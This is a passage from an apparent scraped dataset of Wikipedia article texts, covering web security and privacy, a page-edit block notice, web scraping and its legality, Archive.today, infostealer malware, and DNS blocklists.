engines also maintain real-time information by running an algorithm on a web crawler. Internet content that is not capable of being searched by a web search engine is generally described as the deep web. The deep web, 56 invisible web, 57 or hidden web 58 are parts of the World Wide Web whose contents are not indexed by standard web search engines. The opposite term to the deep web is the surface web, which is accessible to anyone using the Internet. 59 Computer scientist Michael K. Bergman is credited with coining the term deep web in 2001 as a search indexing term. 60 The content of the deep web is hidden behind HTTP forms, 61 62 and includes many very common uses such as web mail, online banking, and services that users must pay for, and which is protected by a paywall, such as video on demand, some online magazines and newspapers, among others. The content of the deep web can be located and accessed by a direct URL or IP address and may require a password or other security access past the public website page. A web cache is a server computer located either on the public Internet or within an enterprise that stores recently accessed web pages to improve response time for users when the same content is requested within a certain time after the original request. Most web browsers also implement a browser cache by writing recently obtained data to a local data storage device. HTTP requests by a browser may ask only for data that has changed since the last access. Web pages and resources may contain expiration information to control caching to secure sensitive data, such as in online banking, or to facilitate frequently updated sites, such as news media. Even sites with highly dynamic content may permit basic resources to be refreshed only occasionally. Web site designers find it worthwhile to collate resources such as CSS data and JavaScript into a few site-wide files so that they can be cached efficiently. Enterprise firewalls often cache Web resources requested by one user for the benefit of many users. Some search engines store cached content of frequently accessed websites. For criminals, the Web has become a venue to spread malware and engage in a range of cybercrimes, including (but not limited to) identity theft, fraud, espionage and intelligence gathering. 63 Web-based vulnerabilities now outnumber traditional computer security concerns, 64 65 and as measured by Google, about one in ten web pages may contain malicious code. 66 Most web-based attacks take place on legitimate websites, and most, as measured by Sophos, are hosted in the United States, China and Russia. 67 The most common of all malware threats is SQL injection attacks against websites. 68 Through HTML and URIs, the Web was vulnerable to attacks like cross-site scripting (XSS) that came with the introduction of JavaScript 69 and were exacerbated to some degree by Web 2.0 and Ajax web design that favours the use of scripts. 70 Today as of? by one estimate, 70% of all websites are open to XSS attacks on their users. 71 Phishing is another common threat to the Web. In February 2013, RSA (the security division of EMC) estimated the global losses from phishing at $1.5 billion in 2012. 72 Two of the well-known phishing methods are Covert Redirect and Open Redirect. Proposed solutions vary. Large security companies like McAfee already design governance and compliance suites to meet post 9 11 regulations, 73 and some, like Finjan have recommended active real-time inspection of programming code and all content regardless of its source. 63 Some have argued that for enterprises to see Web security as a business opportunity rather than a cost centre, 74 while others call for "ubiquitous, always-on digital rights management" enforced in the infrastructure to replace the hundreds of companies that secure data and networks. 75 Jonathan Zittrain has said users sharing responsibility for computing safety is far preferable to locking down the Internet. 76 Every time a client requests a web page, the server can identify the request's IP address. Web servers usually log IP addresses in a log file. Also, unless set not to do so, most web browsers record requested web pages in a viewable history feature, and usually cache much of the content locally. Unless the server-browser communication uses HTTPS encryption, web requests and responses travel in plain text across the Internet and can be viewed, recorded, and cached by intermediate systems. Another way to hide personally identifiable information is by using a virtual private network. A VPN encrypts online traffic and masks the original IP address lowering the chance of user identification. When a web page asks for, and the user supplies, personally identifiable information—such as their real name, address, e-mail address, etc. web-based entities can associate current web traffic with that individual. If the website uses HTTP cookies, username, and password authentication, or other tracking techniques, it can relate other web visits, before and after, to the identifiable information provided. In this way, a web-based organization can develop and build a profile of the individual people who use its site or sites. It may be able to build a record for an individual that includes information about their leisure activities, their shopping interests, their profession, and other aspects of their demographic profile. These profiles are of potential interest to marketers, advertisers, and others. Depending on the website's terms and conditions and the local laws that apply information from these profiles may be sold, shared, or passed to other organizations without the user being informed. For many ordinary people, this means little more than some unexpected e-mails in their in-box or some uncannily relevant advertising on a future web page. For others, it can mean that time spent indulging an unusual interest can result in a deluge of further targeted marketing that may be unwelcome. Law enforcement, counterterrorism, and espionage agencies can also identify, target, and track individuals based on their interests or proclivities on the Web. Social networking sites usually try to get users to use their real names, interests, and locations, rather than pseudonyms, as their executives believe that this makes the social networking experience more engaging for users. On the other hand, uploaded photographs or unguarded statements can be identified to an individual, who may regret this exposure. Employers, schools, parents, and other relatives may be influenced by aspects of social networking profiles, such as text posts or digital photos, that the posting individual did not intend for these audiences. Online bullies may make use of personal information to harass or stalk users. Modern social networking websites allow fine-grained control of the privacy settings for each posting, but these can be complex and not easy to find or use, especially for beginners. 77 Photographs and videos posted onto websites have caused particular problems, as they can add a person's face to an online profile. With modern and potential facial recognition technology, it may then be possible to relate that face with other, previously anonymous, images, events, and scenarios that have been imaged elsewhere. Due to image caching, mirroring, and copying, it is difficult to remove an image from the World Wide Web. Web standards include many interdependent standards and specifications, some of which govern aspects of the Internet, not just the World Wide Web. Even when not web-focused, such standards directly or indirectly affect the development and administration of websites and web services. Considerations include the interoperability, accessibility and usability of web pages and web sites. Web standards, in the broader sense, consist of the following: Web standards are not fixed sets of rules but are constantly evolving sets of finalized technical specifications of web technologies. 84 Web standards are developed by standards organizations—groups of interested and often competing parties chartered with the task of standardization—not technologies developed and declared to be a standard by a single individual or company. It is crucial to distinguish those specifications that are under development from the ones that already reached the final development status (in the case of W3C specifications, the highest maturity level). There are methods for accessing the Web in alternative mediums and formats to facilitate use by individuals with disabilities. These disabilities may be visual, auditory, physical, speech-related, cognitive, neurological, or some combination. Accessibility features also help people with temporary disabilities, like a broken arm, or ageing users as their abilities change. 85 The Web is receiving information as well as providing information and interacting with society. The World Wide Web Consortium claims that it is essential that the Web be accessible, so it can provide equal access and equal opportunity to people with disabilities. 86 Tim Berners-Lee once noted, "The power of the Web is in its universality. Access by everyone regardless of disability is an essential aspect. 85 Many countries regulate web accessibility as a requirement for websites. 87 International co-operation in the W3C Web Accessibility Initiative led to simple guidelines that web content authors as well as software developers can use to make the Web accessible to persons who may or may not be using assistive technology. 85 88 The W3C Internationalisation Activity assures that web technology works in all languages, scripts, and cultures. 89 Beginning in 2004 or 2005, Unicode gained ground and eventually in December 2007 surpassed both ASCII and Western European as the Web's most frequently used character encoding. 90 Originally RFC 3986 allowed resources to be identified by URI in a subset of US-ASCII. RFC 3987 allows more characters—any character in the Universal Character Set—and now a resource can be identified by IRI in any language. 91 |
133 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=19 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Web scraping. |
134 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-16 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
135 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Archive.today | archive.today (or archive.is) is a web archiving website founded in 2012 that saves snapshots on demand, and has support for JavaScript-heavy sites such as Google Maps, and Twitter. 3 archive.today records two snapshots: one replicates the original webpage including any functional live links; the other is a screenshot of the page. 4 The identity of its operator is not apparent. 5 Archive.today was founded in 2012. The site originally branded itself as archive.today, but changed the primary mirror to archive.is in May 2015. 6 It began to deprecate the archive.is domain in favor of other mirrors in January 2019. 7 As of 2021, update archive.today had saved about 500 million pages. 5 Archive.today can capture individual pages in response to explicit user requests. 8 9 10 Since its beginning, it has supported crawling pages with URLs containing the now-deprecated hash-bang fragment ( ). 11 Archive.today records only text and images, excluding XML, RTF, spreadsheet (xls or ods) and other non-static content. However, videos for certain sites, like X (formerly Twitter), are saved. 12 It keeps track of the history of snapshots saved, requesting confirmation before adding a new snapshot of an already saved page. 13 14 Pages are captured at a browser width of 1,024 pixels. CSS is converted to inline CSS, removing responsive web design and selectors such as :hover and :active. Content generated using JavaScript during the crawling process appears in a frozen state. 15 HTML class names are preserved inside the old-class attribute. When text is selected, a JavaScript applet generates a URL fragment seen in the browser's address bar that automatically highlights that portion of the text when visited again. Web pages can be duplicated from archive.today to web.archive.org as second-level backup, but archive.today does not save its snapshots in WARC format. The reverse—from web.archive.org to archive.today—is also possible, 16 but the copy usually takes more time than a direct capture. Historically, website owners had the option to opt out of Wayback Machine through the use of the robots exclusion standard (robots.txt), and these exclusions were also applied retroactively. 17 Archive.today does not obey robots.txt because it acts "as a direct agent of the human user. 10 As of 2019, Wayback Machine no longer obeys robots.txt. The research toolbar enables advanced keywords operators, using as the wildcard character. A couple of quotation marks address the search to an exact sequence of keywords present in the title or in the body of the webpage, whereas the insite operator restricts it to a specific Internet domain. 18 Once a web page is archived, it cannot be deleted directly by any Internet user. 19 Removing advertisements, popups or expanding links from archived pages is possible by asking the owner to do it on his blog. 20 While saving a dynamic list, archive.today search box shows only a result that links the previous and the following section of the list (e.g. 20 links for page). 21 The other web pages saved are filtered, and sometimes may be found by one of their occurrences. 13 clarification needed The search feature is backed by Google CustomSearch. If it delivers no results, archive.today attempts to utilize Yandex Search. 22 While saving a page, a list of URLs for individual page elements and their content sizes, HTTP statuses and MIME types is shown. This list can only be viewed during the crawling process. One can download archived pages as a ZIP file, except pages archived since 29 November 2019, update when archive.today changed their browser engine from PhantomJS to Chromium. 23 In July 2013, Archive.today began supporting the API of the Memento Project. 24 25 In March 2019, the site was blocked for six months by several internet providers in Australia and New Zealand in the aftermath of the Christchurch mosque shootings in an attempt to limit distribution of the footage of the attack. 26 27 According to GreatFire.org, archive.today has been blocked in mainland China since March 2016, update 28 archive.li since September 2017, update 29 archive.fo since July 2018, update 30 as well as archive.ph since December 2019. update 31 On 21 July 2015, the operators blocked access to the service from all Finnish IP addresses, stating on Twitter that they did this in order to avoid escalating a dispute they allegedly had with the Finnish government. 32 In 2016, the Russian communications agency Roskomnadzor began blocking access to archive.is from Russia. 33 34 Since May 2018 35 36 Cloudflare's 1.1.1.1 DNS service would not resolve archive.today's web addresses, making it inaccessible to users of the Cloudflare DNS service. Both organizations claimed the other was responsible for the issue. Cloudflare staff stated that the problem was on archive.today's DNS infrastructure, as its authoritative nameservers return invalid records when Cloudflare's network systems made requests to archive.today. archive.today countered that the issue was due to Cloudflare requests not being compliant with DNS standards, as Cloudflare does not send EDNS Client Subnet information in its DNS requests. 37 38 |
136 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Infostealer | In computing, infostealers are a type of trojan, a form of malicious software, created to breach computer systems to steal sensitive information—including login details, session cookies, financial information, and personally identifiable information. The stolen information are then packaged, sent to the attacker, and often traded on illicit markets to other threat actors. Infostealers usually consist of two parts, the bot framework that allows the attacker to configure the behaviour of the infostealer on the victim's computer and a management panel which takes the form of a server to which the infostealer sends data. Infostealers can infiltrate a computer or device through methods such as phishing attacks, infected websites, and malicious software downloads including video game mods and pirated software. Once downloaded, the infostealers gather sensitive information about the user's computer before sending the data back to the server. Infostealers are usually distributed under the malware-as-a-service (MaaS) model, developers allow other parties to use their infostealers for subscription fees. This allows people with different levels of technical knowledge to deploy an infostealer. The functionality of infostealers can vary, with some focused on data harvesting, while others offer remote access that allows additional malware to be executed. Stolen data may then be used in spearphishing campaigns for other cyber-attacks, such as the deployment of ransomware. The proliferation of infostealer services have contributed to an increase in the number of cybersecurity incidents involving infostealers. The number of stolen data logs being sold on the Russian Market, a cybercrime forum, have increased significantly since 2022. According to Kaspersky's research in mid 2023, 24% of malware offered as a service are infostealers. In cybercrime, credential theft is a well-known mechanism through which malicious individuals steal personal information such as usernames, passwords, or cookies to illegitimately gain access to a victim's online accounts and computer. This crime typically unfolds in four stages, with the first being the acquisition of the stolen credentials. Infostealers, are a specific type of malware, that are designed for this initial stage. They usually consist of two distinct parts: the bot framework and a command and control server, often known as the management panel or interface. 1 The bot framework, includes a builder that allows the attacker to configure how the infostealer will behave on a user's computer and what kind of information it will steal. The management interface, usually written in traditional web development languages like PHP, HTML, and JavaScript 2 is typically hosted on the commercial cloud infrastructure. 3 The management interface, primarily functions as a web server to which the infostealer send confidential information. The interface also provides the attacker with information about the status of the deployed infostealers and allows the attacker to control the behavior of the infostealers. 2 Infostealers are commonly distributed through the malware-as-a-service (MaaS) model, enabling individuals with varying technical knowledge to deploy these malicious programs. Under this model, three distinct groups typically emerge: developers, malware service providers, and operators. Developers, the most technically skilled, write the infostealer code. Malware service providers purchase licenses for the malware and offer it as a service to other cyber criminals. The operators, who can be either developers themselves or service providers depending on their skill level, use these services to perform credential theft. 1 Once the malware is purchased, it is spread to target victim machines using various social engineering techniques. Phishing, including spear phishing campaigns that target specific victims, are commonly employed. Infostealers are commonly embedded in email attachments or malicious links that link to websites performing drive-by downloads. 4 2 Additionally, they are often bundled with compromised or malicious browser extensions, infected game mods, and pirated or otherwise compromised software. 4 After the stealer is downloaded and run by a victim, it communicates with the attacker's command and control servers, allowing the attacker to steal information from the user's computer. While most infostealers primarily target credentials, some also enable attackers to remotely introduce and execute other malware, such as ransomware, on the victim's computer. 1 5 Credentials obtained from infostealer attacks are often distributed as logs or credential dumps, typically shared on paste sites like Pastebin, where cybercriminals may offer free samples, or sold in bulk on underground hacking forums often for amounts as low as $10. 6 7 Buyers of these stolen credentials usually log in to assess their value, particularly looking for credentials associated with financial services or linked to other credentials with similar patterns, as these are especially valuable. 8 High-value credentials are often resold to other cybercriminals at higher prices, 9 who may then use them for various crimes, including financial fraud, 10 integrating the credentials into zombie networks and reputation boosting operations 10 or as springboards for more sophisticated attacks such as scamming businesses, distributing ransomware, or conducting state-sponsored espionage. 11 6 Additionally, some cybercriminals use stolen credentials for social engineering attacks, impersonating the original owner to claim they have been a victim of a crime and soliciting money from the victim’s contacts. 12 13 Many buyers of these stolen credentials take precautions to maintain access for longer periods, such as changing passwords, using Tor networks to obscure their locations, which helps avoid detection by services that might otherwise identify and shut down the stolen credentials. 12 14 An infostealers primary function is to exfiltrate sensitive information about the victim to a attacker's command and control servers. The exact type of data that is exfiltrated will depend on the data-stealing features enabled by the operator and the specific variant of infostealer used. 15 Most infostealers however, do contain functionality to harvest a variety of information about the host operating system, system settings and user profiles. Some more advanced infostealers include the capability to introduce secondary malware like remote access trojans and ransomware. 2 In 2009, researchers at the Symantec Rapid Response team released a technical analysis of the Zeus infostealer, one of the first infostealers to be created. 16 They found that the malware automatically exfiltrated all data stored in a computer's protected storage service (which was usually used by Internet Explorer to store passwords) and tries to capture any passwords sent to the computer using the POP3 and FTP protocol. In addition to this the malware allowed the researchers to define a set of configuration files to specify a list of web injections to perform on a user's computer as well as another configuration file that controlled which web URLs the malware would monitor. Another additional configuration also allowed the researchers to define a set of rules that could be used to test if additional HTTP requests contained passwords or other sensitive information. 17 More recently, in 2020, researchers at the Eindhoven University of Technology conducted a study on the information available for sale on the underground credential black-market impaas.ru. As part of their study, they were able to replicate the workings of a version of the AZORult infostealer. Amongst the functions discovered by the researchers was a builder which allowed operators to define what kind of data would be stolen. The researchers also found evidence of plugins that stole a user's browsing history, a customizable regex based mechanism that allows the attacker to retrieve arbitrary files from a user's computer, a browser password extractor module, a module to extract Skype history and a module to find and exfiltrate cryptocurrency wallet files. 15 The researchers also found that the data most frequently stolen using the AZORult infostealers and sold on the black market could be broadly categorized into three main types: fingerprints, cookies, and resources. Fingerprints consisted of identifiers that were constructed from probing a variety of features made available by the browser. These were not tied to a specific service but were considered to be an accurately unique identifier for a user's browsers. Cookies allowed buyers to hijack a victim's browser session by injecting it into a browser environment. Resources referred to browser-related files found on a user's operating system, such as password storage files. 18 Setting up an infostealer operation has become increasingly accessible due to the proliferation of stealer-as-a-service enterprises, which have significantly lowered the financial and technical barriers. This makes it feasible for even less sophisticated cybercriminals to engage in such activities. 2 In a 2023 paper, researchers from the Georgia Institute of Technology noted that the hosted stealer market is extremely mature and highly competitive, with some operators offering to set up infostealers for as low as $12. 19 For the service providers running these stealer operations, the business is also highly profitable. The researchers estimated that a typical infostealer operator incurs only a few one-off costs: the license to use the infostealer which is obtained from a malware developer, and the registration fee for the domain used to host the command and control server. The primary ongoing cost incurred by these operators is the cost associated with hosting the servers. Based on these calculations, the researchers concluded that the stealer-as-a-service business model is extremely profitable, with many operators achieving profit margins of over 90% with revenues in the high thousands. 20 Due their extremely profitability and accessibility the number of cybersecurity incidents that involve infostealers are on the rise. 6 The COVID 19 post-pandemic shift towards remote and hybrid work, where companies give employees access to enterprise services on their home machines has also been cited as one of the reasons behind the increase in the effectiveness of infostealers. 21 6 In 2023, research by Secureworks discovered that the number of infostealer logs—data exfiltrated from each computer—being sold on the Russian Market, the biggest underground market increased from 2 million to 5 million logs from June 2022 to February 2023. 21 According to Kaspersky's research in mid 2023, 24% of malware offered as a service are infostealers. 22 |
137 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/DNSBL | A Domain Name System blocklist, Domain Name System-based blackhole list, Domain Name System blacklist (DNSBL) or real-time blackhole list (RBL) is a service for operation of mail servers to perform a check via a Domain Name System (DNS) query whether a sending host's IP address is blacklisted for email spam. 1 Most mail server software can be configured to check such lists, typically rejecting or flagging messages from such sites. A DNSBL is a software mechanism, rather than a specific list or policy. Dozens of DNSBLs exist. 2 They use a wide array of criteria for listing and delisting addresses. These may include listing the addresses of zombie computers or other machines being used to send spam, Internet service providers (ISPs) who willingly host spammers, or those which have sent spam to a honeypot system. Since the creation of the first DNSBL in 1998, the operation and policies of these lists have frequently been controversial, 3 4 both in Internet advocacy circles and occasionally in lawsuits. Many email systems operators and users 5 consider DNSBLs a valuable tool to share information about sources of spam, but others including some prominent Internet activists have objected to them as a form of censorship. 6 7 8 9 In addition, a small number of DNSBL operators have been the target of lawsuits filed by spammers seeking to have the lists shut down. 10 The first DNSBL was the Real-time Blackhole List (RBL), created in 